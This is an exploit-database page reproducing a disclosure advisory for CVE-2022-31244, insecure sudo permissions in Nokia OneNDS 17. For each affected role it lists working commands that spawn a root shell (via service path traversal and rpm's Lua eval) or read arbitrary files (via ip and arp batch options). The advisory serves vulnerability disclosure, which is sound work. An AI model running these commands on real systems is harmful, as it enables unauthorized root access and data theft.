Advertisement






Nokia OneNDS 17 Insecure Permissions / Privilege Escalation

CVE Category Price Severity
CVE-2022-31244 CWE-XXX Not disclosed Medium
Author Risk Exploitation Type Date
Unknown High Local 2023-04-23
CVSS
3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023040076

Below is a copy:

Nokia OneNDS 17 Insecure Permissions / Privilege Escalation
===============================================================================
             title: Incorrect Permission Assignment
           product: Nokia OneNDS 17
vulnerability type: Security Misconfiguration
          severity: High
        CVSS Score: 7.8
       CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
          found on: 31/03/2022
                by: Giacomo Sighinolfi, Milena Mangiola, 
                    Savino Sisco, Valerio Casalino
               cve: CVE-2022-31244
===============================================================================

Some sudo permissions can be exploited by the users that have specific roles
to escalate to root privileges and execute arbitrary commands on the system.

The affected roles are:
ONENDS_CC_BASIC_ADMIN: 
 - it can run /sbin/service 
 - can be exploited using `sudo /sbin/service ../../bin/sh`
ONENDS_CC_SERVICE_ADMIN: 
 - it can run /bin/rpm 
 - can be exploited using `sudo /bin/rpm --eval '%{lua:os.execute("/bin/sh")}'`
ONENDS_CC_NETWORK_MANAGEMENT: 
 - it can run /sbin/ip,/sbin/arp 
 - can be exploited using `sudo /sbin/ip -force -batch 'file_to_read'`
 - can be exploited using `sudo /sbin/arp -v -f 'file_to_read'`

===============================================================================

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.